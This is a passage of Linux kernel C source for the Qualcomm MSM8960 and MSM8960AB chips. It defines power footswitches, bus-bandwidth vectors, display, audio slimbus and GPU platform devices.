{ .name = "vsync_clk" },
{ .name = "lut_clk" },
{ .name = "tv_src_clk" },
{ .name = "tv_clk" },
{ .name = "reset1_clk" },
{ .name = "reset2_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_MDP_PORT0,
.bus_port1 = MSM_BUS_MASTER_MDP_PORT1,
};
static struct fs_driver_data rot_fs_data = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk" },
{ .name = "iface_clk" },
{ .name = "bus_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_ROTATOR,
};
static struct fs_driver_data ved_fs_data = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk" },
{ .name = "iface_clk" },
{ .name = "bus_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_HD_CODEC_PORT0,
.bus_port1 = MSM_BUS_MASTER_HD_CODEC_PORT1,
};
/* 8960AB video core uses separate decode/encode bus masters. */
static struct fs_driver_data ved_fs_data_8960ab = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk" },
{ .name = "iface_clk" },
{ .name = "bus_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_VIDEO_DEC,
.bus_port1 = MSM_BUS_MASTER_VIDEO_ENC,
};
static struct fs_driver_data vfe_fs_data = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk" },
{ .name = "iface_clk" },
{ .name = "bus_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_VFE,
};
static struct fs_driver_data vpe_fs_data = {
.clks = (struct fs_clk_data[]){
{ .name = "core_clk" },
{ .name = "iface_clk" },
{ .name = "bus_clk" },
{ 0 }
},
.bus_port0 = MSM_BUS_MASTER_VPE,
};
/* Footswitch devices for MSM8960: one FS_8X60() entry per powered core,
 * pairing the "vdd" supply consumer device with its fs_driver_data. */
struct platform_device *msm8960_footswitch[] __initdata = {
FS_8X60(FS_MDP, "vdd", "mdp.0", &mdp_fs_data),
FS_8X60(FS_ROT, "vdd", "msm_rotator.0", &rot_fs_data),
FS_8X60(FS_IJPEG, "vdd", "msm_gemini.0", &ijpeg_fs_data),
FS_8X60(FS_VFE, "vdd", "msm_vfe.0", &vfe_fs_data),
FS_8X60(FS_VPE, "vdd", "msm_vpe.0", &vpe_fs_data),
FS_8X60(FS_GFX3D, "vdd", "kgsl-3d0.0", &gfx3d_fs_data),
FS_8X60(FS_GFX2D0, "vdd", "kgsl-2d0.0", &gfx2d0_fs_data),
FS_8X60(FS_GFX2D1, "vdd", "kgsl-2d1.1", &gfx2d1_fs_data),
FS_8X60(FS_VED, "vdd", "msm_vidc.0", &ved_fs_data),
};
unsigned msm8960_num_footswitch __initdata = ARRAY_SIZE(msm8960_footswitch);
/* MSM8960AB variant: no 2D cores, and AB-specific 3D/video data. */
struct platform_device *msm8960ab_footswitch[] __initdata = {
FS_8X60(FS_MDP, "vdd", "mdp.0", &mdp_fs_data),
FS_8X60(FS_ROT, "vdd", "msm_rotator.0", &rot_fs_data),
FS_8X60(FS_IJPEG, "vdd", "msm_gemini.0", &ijpeg_fs_data),
FS_8X60(FS_VFE, "vdd", "msm_vfe.0", &vfe_fs_data),
FS_8X60(FS_VPE, "vdd", "msm_vpe.0", &vpe_fs_data),
FS_8X60(FS_GFX3D, "vdd", "kgsl-3d0.0", &gfx3d_fs_data_8960ab),
FS_8X60(FS_VED, "vdd", "msm_vidc.0", &ved_fs_data_8960ab),
};
unsigned msm8960ab_num_footswitch __initdata = ARRAY_SIZE(msm8960ab_footswitch);
#ifdef CONFIG_MSM_ROTATOR
/*
 * Rotator bus-bandwidth vectors, one use case per resolution class.
 * ab = arbitrated (average) bandwidth, ib = instantaneous bandwidth;
 * values are width * height * bytes/pixel * 2 passes * fps, with ib
 * carrying a 1.5x headroom factor.
 */
static struct msm_bus_vectors rotator_init_vectors[] = {
{
.src = MSM_BUS_MASTER_ROTATOR,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = 0,
},
};
/* UI case; overwritten at boot by msm_rotator_update_bus_vectors(). */
static struct msm_bus_vectors rotator_ui_vectors[] = {
{
.src = MSM_BUS_MASTER_ROTATOR,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = (1024 * 600 * 4 * 2 * 60),
.ib = (1024 * 600 * 4 * 2 * 60 * 1.5),
},
};
static struct msm_bus_vectors rotator_vga_vectors[] = {
{
.src = MSM_BUS_MASTER_ROTATOR,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = (640 * 480 * 2 * 2 * 30),
.ib = (640 * 480 * 2 * 2 * 30 * 1.5),
},
};
static struct msm_bus_vectors rotator_720p_vectors[] = {
{
.src = MSM_BUS_MASTER_ROTATOR,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = (1280 * 736 * 2 * 2 * 30),
.ib = (1280 * 736 * 2 * 2 * 30 * 1.5),
},
};
static struct msm_bus_vectors rotator_1080p_vectors[] = {
{
.src = MSM_BUS_MASTER_ROTATOR,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = (1920 * 1088 * 2 * 2 * 30),
.ib = (1920 * 1088 * 2 * 2 * 30 * 1.5),
},
};
/* Use-case table; index order defines the client's vote levels. */
static struct msm_bus_paths rotator_bus_scale_usecases[] = {
{
ARRAY_SIZE(rotator_init_vectors),
rotator_init_vectors,
},
{
ARRAY_SIZE(rotator_ui_vectors),
rotator_ui_vectors,
},
{
ARRAY_SIZE(rotator_vga_vectors),
rotator_vga_vectors,
},
{
ARRAY_SIZE(rotator_720p_vectors),
rotator_720p_vectors,
},
{
ARRAY_SIZE(rotator_1080p_vectors),
rotator_1080p_vectors,
},
};
struct msm_bus_scale_pdata rotator_bus_scale_pdata = {
rotator_bus_scale_usecases,
ARRAY_SIZE(rotator_bus_scale_usecases),
.name = "rotator",
};
/*
 * msm_rotator_update_bus_vectors() - retune the rotator "UI" bandwidth
 * vote for the actual panel resolution.
 * @xres: panel width in pixels
 * @yres: panel height in pixels
 *
 * Bandwidth is xres * yres * 4 bytes/pixel * 2 passes * 60 fps; the
 * instantaneous vote (ib) carries a 1.5x headroom factor.
 *
 * Do the arithmetic in 64 bits: the previous 32-bit expression
 * "xres * yres * 4 * 2 * 60 * 3 / 2" wraps for large panels
 * (e.g. 2560x1600 -> ~5.9e9 > 2^32), producing a bogus ib vote.
 */
void __init msm_rotator_update_bus_vectors(unsigned int xres,
unsigned int yres)
{
unsigned long long ab = (unsigned long long)xres * yres * 4 * 2 * 60;

rotator_ui_vectors[0].ab = ab;
rotator_ui_vectors[0].ib = ab * 3 / 2;
}
/* Rotator hardware block: register window, IRQ, and clock table. */
#define ROTATOR_HW_BASE 0x04E00000
static struct resource resources_msm_rotator[] = {
{
.start = ROTATOR_HW_BASE,
.end = ROTATOR_HW_BASE + 0x100000 - 1,
.flags = IORESOURCE_MEM,
},
{
.start = ROT_IRQ,
.end = ROT_IRQ,
.flags = IORESOURCE_IRQ,
},
};
static struct msm_rot_clocks rotator_clocks[] = {
{
.clk_name = "core_clk",
.clk_type = ROTATOR_CORE_CLK,
.clk_rate = 200 * 1000 * 1000,
},
{
/* rate 0: leave the interface clock at its default rate */
.clk_name = "iface_clk",
.clk_type = ROTATOR_PCLK,
.clk_rate = 0,
},
};
static struct msm_rotator_platform_data rotator_pdata = {
.number_of_clocks = ARRAY_SIZE(rotator_clocks),
.hardware_version_number = 0x01020309,
.rotator_clks = rotator_clocks,
#ifdef CONFIG_MSM_BUS_SCALING
.bus_scale_table = &rotator_bus_scale_pdata,
#endif
};
struct platform_device msm_rotator_device = {
.name = "msm_rotator",
.id = 0,
.num_resources = ARRAY_SIZE(resources_msm_rotator),
.resource = resources_msm_rotator,
.dev = {
.platform_data = &rotator_pdata,
},
};
/* Called by board code to put the rotator on a split IOMMU domain. */
void __init msm_rotator_set_split_iommu_domain(void)
{
rotator_pdata.rot_iommu_split_domain = 1;
}
#endif
/* Display blocks: MIPI DSI controller 1 and the MDP. */
#define MIPI_DSI_HW_BASE 0x04700000
#define MDP_HW_BASE 0x05100000
static struct resource msm_mipi_dsi1_resources[] = {
{
.name = "mipi_dsi",
.start = MIPI_DSI_HW_BASE,
.end = MIPI_DSI_HW_BASE + 0x000F0000 - 1,
.flags = IORESOURCE_MEM,
},
{
.start = DSI1_IRQ,
.end = DSI1_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct platform_device msm_mipi_dsi1_device = {
.name = "mipi_dsi",
.id = 1,
.num_resources = ARRAY_SIZE(msm_mipi_dsi1_resources),
.resource = msm_mipi_dsi1_resources,
};
static struct resource msm_mdp_resources[] = {
{
.name = "mdp",
.start = MDP_HW_BASE,
.end = MDP_HW_BASE + 0x000F0000 - 1,
.flags = IORESOURCE_MEM,
},
{
.start = MDP_IRQ,
.end = MDP_IRQ,
.flags = IORESOURCE_IRQ,
},
};
/* Registered lazily via msm_fb_register_device(), not at device init. */
static struct platform_device msm_mdp_device = {
.name = "mdp",
.id = 0,
.num_resources = ARRAY_SIZE(msm_mdp_resources),
.resource = msm_mdp_resources,
};
/*
 * msm_register_device() - attach @data as platform data to @pdev and
 * register it, logging (but not propagating) any registration failure.
 */
static void __init msm_register_device(struct platform_device *pdev, void *data)
{
	int rc;

	pdev->dev.platform_data = data;

	rc = platform_device_register(pdev);
	if (rc)
		dev_err(&pdev->dev,
			"%s: platform_device_register() failed = %d\n",
			__func__, rc);
}
/* DTV (only with bus scaling) and LVDS display devices; registered on
 * demand via msm_fb_register_device(). */
#ifdef CONFIG_MSM_BUS_SCALING
static struct platform_device msm_dtv_device = {
.name = "dtv",
.id = 0,
};
#endif
struct platform_device msm_lvds_device = {
.name = "lvds",
.id = 0,
};
/*
 * msm_fb_register_device() - register the framebuffer-related platform
 * device selected by the @name prefix, attaching @data as its platform
 * data.  Unknown names are logged and ignored.
 */
void __init msm_fb_register_device(char *name, void *data)
{
	if (strncmp(name, "mdp", 3) == 0) {
		msm_register_device(&msm_mdp_device, data);
		return;
	}
	if (strncmp(name, "mipi_dsi", 8) == 0) {
		msm_register_device(&msm_mipi_dsi1_device, data);
		return;
	}
	if (strncmp(name, "lvds", 4) == 0) {
		msm_register_device(&msm_lvds_device, data);
		return;
	}
#ifdef CONFIG_MSM_BUS_SCALING
	if (strncmp(name, "dtv", 3) == 0) {
		msm_register_device(&msm_dtv_device, data);
		return;
	}
#endif
	printk(KERN_ERR "%s: unknown device! %s\n", __func__, name);
}
/* SPS (smart peripheral subsystem) device: pipe memory plus the BAM DMA
 * register windows and its IRQ. */
static struct resource resources_sps[] = {
{
.name = "pipe_mem",
.start = 0x12800000,
.end = 0x12800000 + 0x4000 - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "bamdma_dma",
.start = 0x12240000,
.end = 0x12240000 + 0x1000 - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "bamdma_bam",
.start = 0x12244000,
.end = 0x12244000 + 0x4000 - 1,
.flags = IORESOURCE_MEM,
},
{
.name = "bamdma_irq",
.start = SPS_BAM_DMA_IRQ,
.end = SPS_BAM_DMA_IRQ,
.flags = IORESOURCE_IRQ,
},
};
struct msm_sps_platform_data msm_sps_pdata = {
/* Bitmask of BAM DMA pipes not usable by the apps processor. */
.bamdma_restricted_pipes = 0x06,
};
struct platform_device msm_device_sps = {
.name = "msm_sps",
.id = -1,
.num_resources = ARRAY_SIZE(resources_sps),
.resource = resources_sps,
.dev.platform_data = &msm_sps_pdata,
};
#ifdef CONFIG_MSM_MPM
/*
 * MPM (MSM power manager) data.  irqs_m2a maps MPM interrupt numbers
 * (array index) to the corresponding apps-processor IRQs; unlisted
 * entries are zero.
 */
static uint16_t msm_mpm_irqs_m2a[MSM_MPM_NR_MPM_IRQS] __initdata = {
[1] = MSM_GPIO_TO_INT(46),
[2] = MSM_GPIO_TO_INT(150),
[4] = MSM_GPIO_TO_INT(103),
[5] = MSM_GPIO_TO_INT(104),
[6] = MSM_GPIO_TO_INT(105),
[7] = MSM_GPIO_TO_INT(106),
[8] = MSM_GPIO_TO_INT(107),
[9] = MSM_GPIO_TO_INT(7),
[10] = MSM_GPIO_TO_INT(11),
[11] = MSM_GPIO_TO_INT(15),
[12] = MSM_GPIO_TO_INT(19),
[13] = MSM_GPIO_TO_INT(23),
[14] = MSM_GPIO_TO_INT(27),
[15] = MSM_GPIO_TO_INT(31),
[16] = MSM_GPIO_TO_INT(35),
[19] = MSM_GPIO_TO_INT(90),
[20] = MSM_GPIO_TO_INT(92),
[23] = MSM_GPIO_TO_INT(85),
[24] = MSM_GPIO_TO_INT(83),
[25] = USB1_HS_IRQ,
[27] = HDMI_IRQ,
[29] = MSM_GPIO_TO_INT(10),
[30] = MSM_GPIO_TO_INT(102),
[31] = MSM_GPIO_TO_INT(81),
[32] = MSM_GPIO_TO_INT(78),
[33] = MSM_GPIO_TO_INT(94),
[34] = MSM_GPIO_TO_INT(72),
[35] = MSM_GPIO_TO_INT(39),
[36] = MSM_GPIO_TO_INT(43),
[37] = MSM_GPIO_TO_INT(61),
[38] = MSM_GPIO_TO_INT(50),
[39] = MSM_GPIO_TO_INT(42),
[41] = MSM_GPIO_TO_INT(62),
[42] = MSM_GPIO_TO_INT(76),
[43] = MSM_GPIO_TO_INT(75),
[44] = MSM_GPIO_TO_INT(70),
[45] = MSM_GPIO_TO_INT(69),
[46] = MSM_GPIO_TO_INT(67),
[47] = MSM_GPIO_TO_INT(65),
[48] = MSM_GPIO_TO_INT(58),
[49] = MSM_GPIO_TO_INT(54),
[50] = MSM_GPIO_TO_INT(52),
[51] = MSM_GPIO_TO_INT(49),
[52] = MSM_GPIO_TO_INT(40),
[53] = MSM_GPIO_TO_INT(37),
[54] = MSM_GPIO_TO_INT(24),
[55] = MSM_GPIO_TO_INT(14),
};
/* Apps IRQs the MPM should not monitor (handled directly). */
static uint16_t msm_mpm_bypassed_apps_irqs[] __initdata = {
TLMM_MSM_SUMMARY_IRQ,
RPM_APCC_CPU0_GP_HIGH_IRQ,
RPM_APCC_CPU0_GP_MEDIUM_IRQ,
RPM_APCC_CPU0_GP_LOW_IRQ,
RPM_APCC_CPU0_WAKE_UP_IRQ,
RPM_APCC_CPU1_GP_HIGH_IRQ,
RPM_APCC_CPU1_GP_MEDIUM_IRQ,
RPM_APCC_CPU1_GP_LOW_IRQ,
RPM_APCC_CPU1_WAKE_UP_IRQ,
MSS_TO_APPS_IRQ_0,
MSS_TO_APPS_IRQ_1,
MSS_TO_APPS_IRQ_2,
MSS_TO_APPS_IRQ_3,
MSS_TO_APPS_IRQ_4,
MSS_TO_APPS_IRQ_5,
MSS_TO_APPS_IRQ_6,
MSS_TO_APPS_IRQ_7,
MSS_TO_APPS_IRQ_8,
MSS_TO_APPS_IRQ_9,
LPASS_SCSS_GP_LOW_IRQ,
LPASS_SCSS_GP_MEDIUM_IRQ,
LPASS_SCSS_GP_HIGH_IRQ,
SPS_MTI_30,
SPS_MTI_31,
RIVA_APSS_SPARE_IRQ,
RIVA_APPS_WLAN_SMSM_IRQ,
RIVA_APPS_WLAN_RX_DATA_AVAIL_IRQ,
RIVA_APPS_WLAN_DATA_XFER_DONE_IRQ,
};
struct msm_mpm_device_data msm8960_mpm_dev_data __initdata = {
.irqs_m2a = msm_mpm_irqs_m2a,
.irqs_m2a_size = ARRAY_SIZE(msm_mpm_irqs_m2a),
.bypassed_apps_irqs = msm_mpm_bypassed_apps_irqs,
.bypassed_apps_irqs_size = ARRAY_SIZE(msm_mpm_bypassed_apps_irqs),
.mpm_request_reg_base = MSM_RPM_BASE + 0x9d8,
.mpm_status_reg_base = MSM_RPM_BASE + 0xdf8,
.mpm_apps_ipc_reg = MSM_APCS_GCC_BASE + 0x008,
.mpm_apps_ipc_val = BIT(1),
.mpm_ipc_irq = RPM_APCC_CPU0_GP_MEDIUM_IRQ,
};
#endif
#define LPASS_SLIMBUS_PHYS 0x28080000
#define LPASS_SLIMBUS_BAM_PHYS 0x28084000
#define LPASS_SLIMBUS_SLEW (MSM8960_TLMM_PHYS + 0x207C)
/* Board info for the slimbus slave device */
static struct resource slimbus_res[] = {
{
.start = LPASS_SLIMBUS_PHYS,
.end = LPASS_SLIMBUS_PHYS + 8191,
.flags = IORESOURCE_MEM,
.name = "slimbus_physical",
},
{
.start = LPASS_SLIMBUS_BAM_PHYS,
.end = LPASS_SLIMBUS_BAM_PHYS + 8191,
.flags = IORESOURCE_MEM,
.name = "slimbus_bam_physical",
},
{
/* single 4-byte slew-rate control register in the TLMM block */
.start = LPASS_SLIMBUS_SLEW,
.end = LPASS_SLIMBUS_SLEW + 4 - 1,
.flags = IORESOURCE_MEM,
.name = "slimbus_slew_reg",
},
{
.start = SLIMBUS0_CORE_EE1_IRQ,
.end = SLIMBUS0_CORE_EE1_IRQ,
.flags = IORESOURCE_IRQ,
.name = "slimbus_irq",
},
{
.start = SLIMBUS0_BAM_EE1_IRQ,
.end = SLIMBUS0_BAM_EE1_IRQ,
.flags = IORESOURCE_IRQ,
.name = "slimbus_bam_irq",
},
};
struct platform_device msm_slim_ctrl = {
.name = "msm_slim_ctrl",
.id = 1,
.num_resources = ARRAY_SIZE(slimbus_res),
.resource = slimbus_res,
.dev = {
/* 32-bit DMA addressing */
.coherent_dma_mask = 0xffffffffULL,
},
};
/*
 * GPU DCVS (dynamic clock and voltage scaling) tables for the 3D and 2D
 * cores.  Entry field meanings are defined by struct
 * msm_dcvs_freq_entry — presumably (freq, voltage, and per-level tuning
 * values); confirm against the msm_dcvs header before editing.
 */
static struct msm_dcvs_freq_entry grp3d_freq[] = {
{0, 900, 0, 0, 0},
{0, 950, 0, 0, 0},
{0, 950, 0, 0, 0},
{0, 1200, 1, 100, 100},
};
static struct msm_dcvs_freq_entry grp2d_freq[] = {
{0, 900, 0, 0, 0},
{0, 950, 1, 100, 100},
};
/* 3D-core DCVS configuration: algorithm tuning and energy model. */
static struct msm_dcvs_core_info grp3d_core_info = {
.freq_tbl = &grp3d_freq[0],
.core_param = {
.core_type = MSM_DCVS_CORE_TYPE_GPU,
},
.algo_param = {
.disable_pc_threshold = 0,
.em_win_size_min_us = 100000,
.em_win_size_max_us = 300000,
.em_max_util_pct = 97,
.group_id = 0,
.max_freq_chg_time_us = 100000,
.slack_mode_dynamic = 0,
.slack_weight_thresh_pct = 0,
.slack_time_min_us = 39000,
.slack_time_max_us = 39000,
.ss_win_size_min_us = 1000000,
.ss_win_size_max_us = 1000000,
.ss_util_pct = 95,
.ss_no_corr_below_freq = 0,
},
.energy_coeffs = {
.active_coeff_a = 2492,
.active_coeff_b = 0,
.active_coeff_c = 0,
.leakage_coeff_a = -17720,
.leakage_coeff_b = 37,
.leakage_coeff_c = 2729,
.leakage_coeff_d = -277,
},
.power_param = {
.current_temp = 25,
.num_freq = ARRAY_SIZE(grp3d_freq),
}
};
/* 2D-core DCVS configuration: same tuning, smaller frequency table. */
static struct msm_dcvs_core_info grp2d_core_info = {
.freq_tbl = &grp2d_freq[0],
.core_param = {
.core_type = MSM_DCVS_CORE_TYPE_GPU,
},
.algo_param = {
.disable_pc_threshold = 0,
.em_win_size_min_us = 100000,
.em_win_size_max_us = 300000,
.em_max_util_pct = 97,
.group_id = 0,
.max_freq_chg_time_us = 100000,
.slack_mode_dynamic = 0,
.slack_weight_thresh_pct = 0,
.slack_time_min_us = 39000,
.slack_time_max_us = 39000,
.ss_win_size_min_us = 1000000,
.ss_win_size_max_us = 1000000,
.ss_util_pct = 95,
.ss_no_corr_below_freq = 0,
},
.energy_coeffs = {
.active_coeff_a = 2492,
.active_coeff_b = 0,
.active_coeff_c = 0,
.leakage_coeff_a = -17720,
.leakage_coeff_b = 37,
.leakage_coeff_c = 2729,
.leakage_coeff_d = -277,
},
.power_param = {
.current_temp = 25,
.num_freq = ARRAY_SIZE(grp2d_freq),
}
};
#ifdef CONFIG_MSM_BUS_SCALING
/*
 * GPU bus-bandwidth vectors.  Each vector votes an instantaneous
 * bandwidth (ib) from the GPU master to EBI; ab stays 0 so only peak
 * bandwidth is reserved.  Use-case order defines the vote levels the
 * KGSL pwrlevels index with .bus_freq.
 */
static struct msm_bus_vectors grp3d_init_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_3D,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = 0,
},
};
static struct msm_bus_vectors grp3d_low_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_3D,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = KGSL_CONVERT_TO_MBPS(1000),
},
};
static struct msm_bus_vectors grp3d_nominal_low_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_3D,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = KGSL_CONVERT_TO_MBPS(2048),
},
};
static struct msm_bus_vectors grp3d_nominal_high_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_3D,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = KGSL_CONVERT_TO_MBPS(2656),
},
};
static struct msm_bus_vectors grp3d_max_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_3D,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = KGSL_CONVERT_TO_MBPS(3968),
},
};
static struct msm_bus_paths grp3d_bus_scale_usecases[] = {
{
ARRAY_SIZE(grp3d_init_vectors),
grp3d_init_vectors,
},
{
ARRAY_SIZE(grp3d_low_vectors),
grp3d_low_vectors,
},
{
ARRAY_SIZE(grp3d_nominal_low_vectors),
grp3d_nominal_low_vectors,
},
{
ARRAY_SIZE(grp3d_nominal_high_vectors),
grp3d_nominal_high_vectors,
},
{
ARRAY_SIZE(grp3d_max_vectors),
grp3d_max_vectors,
},
};
static struct msm_bus_scale_pdata grp3d_bus_scale_pdata = {
grp3d_bus_scale_usecases,
ARRAY_SIZE(grp3d_bus_scale_usecases),
.name = "grp3d",
};
static struct msm_bus_vectors grp2d0_init_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_2D_CORE0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = 0,
},
};
static struct msm_bus_vectors grp2d0_nominal_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_2D_CORE0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = KGSL_CONVERT_TO_MBPS(1000),
},
};
static struct msm_bus_vectors grp2d0_max_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_2D_CORE0,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = KGSL_CONVERT_TO_MBPS(2048),
},
};
static struct msm_bus_paths grp2d0_bus_scale_usecases[] = {
{
ARRAY_SIZE(grp2d0_init_vectors),
grp2d0_init_vectors,
},
{
ARRAY_SIZE(grp2d0_nominal_vectors),
grp2d0_nominal_vectors,
},
{
ARRAY_SIZE(grp2d0_max_vectors),
grp2d0_max_vectors,
},
};
struct msm_bus_scale_pdata grp2d0_bus_scale_pdata = {
grp2d0_bus_scale_usecases,
ARRAY_SIZE(grp2d0_bus_scale_usecases),
.name = "grp2d0",
};
static struct msm_bus_vectors grp2d1_init_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_2D_CORE1,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = 0,
},
};
static struct msm_bus_vectors grp2d1_nominal_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_2D_CORE1,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = KGSL_CONVERT_TO_MBPS(1000),
},
};
static struct msm_bus_vectors grp2d1_max_vectors[] = {
{
.src = MSM_BUS_MASTER_GRAPHICS_2D_CORE1,
.dst = MSM_BUS_SLAVE_EBI_CH0,
.ab = 0,
.ib = KGSL_CONVERT_TO_MBPS(2048),
},
};
static struct msm_bus_paths grp2d1_bus_scale_usecases[] = {
{
ARRAY_SIZE(grp2d1_init_vectors),
grp2d1_init_vectors,
},
{
ARRAY_SIZE(grp2d1_nominal_vectors),
grp2d1_nominal_vectors,
},
{
ARRAY_SIZE(grp2d1_max_vectors),
grp2d1_max_vectors,
},
};
struct msm_bus_scale_pdata grp2d1_bus_scale_pdata = {
grp2d1_bus_scale_usecases,
ARRAY_SIZE(grp2d1_bus_scale_usecases),
.name = "grp2d1",
};
#endif
/* KGSL 3D core resources for MSM8960AB: split register and shader
 * memory windows, plus the GFX3D IRQ. */
struct resource kgsl_3d0_resources_8960ab[] = {
{
.name = KGSL_3D0_REG_MEMORY,
.start = 0x04300000, /* GFX3D address */
.end = 0x0430ffff,
.flags = IORESOURCE_MEM,
},
{
.name = KGSL_3D0_SHADER_MEMORY,
.start = 0x04310000, /* Shader Mem Address (8960AB) */
.end = 0x0431ffff,
.flags = IORESOURCE_MEM,
},
{
.name = KGSL_3D0_IRQ,
.start = GFX3D_IRQ,
.end = GFX3D_IRQ,
.flags = IORESOURCE_IRQ,
},
};
int kgsl_num_resources_8960ab = ARRAY_SIZE(kgsl_3d0_resources_8960ab);
/* KGSL 3D core resources for plain MSM8960: one combined register
 * window (covers the range the 8960AB splits in two) and the IRQ. */
static struct resource kgsl_3d0_resources_8960[] = {
{
.name = KGSL_3D0_REG_MEMORY,
.start = 0x04300000, /* GFX3D address */
.end = 0x0431ffff,
.flags = IORESOURCE_MEM,
},
{
.name = KGSL_3D0_IRQ,
.start = GFX3D_IRQ,
.end = GFX3D_IRQ,
.flags = IORESOURCE_IRQ,
},
};
/* IOMMU contexts for the 3D core: user and privileged contexts on each
 * of the two GFX IOMMUs, with their register windows. */
static const struct kgsl_iommu_ctx kgsl_3d0_iommu0_ctxs[] = {
{ "gfx3d_user", 0 },
{ "gfx3d_priv", 1 },
};
static const struct kgsl_iommu_ctx kgsl_3d0_iommu1_ctxs[] = {
{ "gfx3d1_user", 0 },
{ "gfx3d1_priv", 1 },
};
static struct kgsl_device_iommu_data kgsl_3d0_iommu_data[] = {
{
.iommu_ctxs = kgsl_3d0_iommu0_ctxs,
.iommu_ctx_count = ARRAY_SIZE(kgsl_3d0_iommu0_ctxs),
.physstart = 0x07C00000,
.physend = 0x07C00000 + SZ_1M - 1,
},
{
.iommu_ctxs = kgsl_3d0_iommu1_ctxs,
.iommu_ctx_count = ARRAY_SIZE(kgsl_3d0_iommu1_ctxs),
.physstart = 0x07D00000,
.physend = 0x07D00000 + SZ_1M - 1,
},
};
static struct kgsl_device_platform_data kgsl_3d0_pdata = {
.pwrlevel = {
{
.gpu_freq = 487500000,
.bus_freq = 5,
.io_fraction = 0,
},
{
.gpu_freq = 400000000,
.bus_freq = 4,
.io_fraction = 0,
},
{
.gpu_freq = 325000000,
.bus_freq = 3,
.io_fraction = 33,
},
{
.gpu_freq = 200000000,
.bus_freq = 2,
.io_fraction = 100,
},
{
.gpu_freq = 128000000,
.bus_freq = 1,
.io_fraction = 100,
},
{
.gpu_freq = 27000000,
.bus_freq = 0,
},
},
.init_level = 1,
.num_levels = 5, //ARRAY_SIZE(grp3d_freq) + 1,
.set_grp_async = NULL,
.idle_timeout = HZ/12,
.clk_map = KGSL_CLK_CORE | KGSL_CLK_IFACE | KGSL_CLK_MEM_IFACE,
#ifdef CONFIG_MSM_BUS_SCALING
.bus_scale_table = &grp3d_bus_scale_pdata,
#endif
.iommu_data = kgsl_3d0_iommu_data,
.iommu_count = ARRAY_SIZE(kgsl_3d0_iommu_data),
.core_info = &grp3d_core_info,
};
/* KGSL 3D device; board code may swap in the 8960AB resource table. */
struct platform_device msm_kgsl_3d0 = {
.name = "kgsl-3d0",
.id = 0,
.num_resources = ARRAY_SIZE(kgsl_3d0_resources_8960),
.resource = kgsl_3d0_resources_8960,
.dev = {
.platform_data = &kgsl_3d0_pdata,
},
};
/* KGSL 2D core 0 (Z180): resources, IOMMU context, platform data and
 * device. */
static struct resource kgsl_2d0_resources[] = {
{
.name = KGSL_2D0_REG_MEMORY,
.start = 0x04100000, /* Z180 base address */
.end = 0x04100FFF,
.flags = IORESOURCE_MEM,
},
{
.name = KGSL_2D0_IRQ,
.start = GFX2D0_IRQ,
.end = GFX2D0_IRQ,
.flags = IORESOURCE_IRQ,
},
};
static const struct kgsl_iommu_ctx kgsl_2d0_iommu_ctxs[] = {
{ "gfx2d0_2d0", 0 },
};
static struct kgsl_device_iommu_data kgsl_2d0_iommu_data[] = {
{
.iommu_ctxs = kgsl_2d0_iommu_ctxs,
.iommu_ctx_count = ARRAY_SIZE(kgsl_2d0_iommu_ctxs),
.physstart = 0x07D00000,
.physend = 0x07D00000 + SZ_1M - 1,
},
};
static struct kgsl_device_platform_data kgsl_2d0_pdata = {
.pwrlevel = {
{
.gpu_freq = 200000000,
.bus_freq = 2,
},
{
.gpu_freq = 96000000,
.bus_freq = 1,
},
{
.gpu_freq = 27000000,
.bus_freq = 0,
},
},
.init_level = 0,
.num_levels = ARRAY_SIZE(grp2d_freq) + 1,
.set_grp_async = NULL,
.idle_timeout = HZ/5,
.clk_map = KGSL_CLK_CORE | KGSL_CLK_IFACE,
#ifdef CONFIG_MSM_BUS_SCALING
.bus_scale_table = &grp2d0_bus_scale_pdata,
#endif
.iommu_data = kgsl_2d0_iommu_data,
.iommu_count = ARRAY_SIZE(kgsl_2d0_iommu_data),
.core_info = &grp2d_core_info,
};
struct platform_device msm_kgsl_2d0 = {
.name = "kgsl-2d0",
.id = 0,
.num_resources = ARRAY_SIZE(kgsl_2d0_resources),
.resource = kgsl_2d0_resources,
.dev = {
.platform_data = &kgsl_2d0_pdata,
},
};
/* KGSL 2D core 1 (second Z180): mirrors the 2d0 setup with its own
 * IOMMU window, register base, IRQ and bus-scale table. */
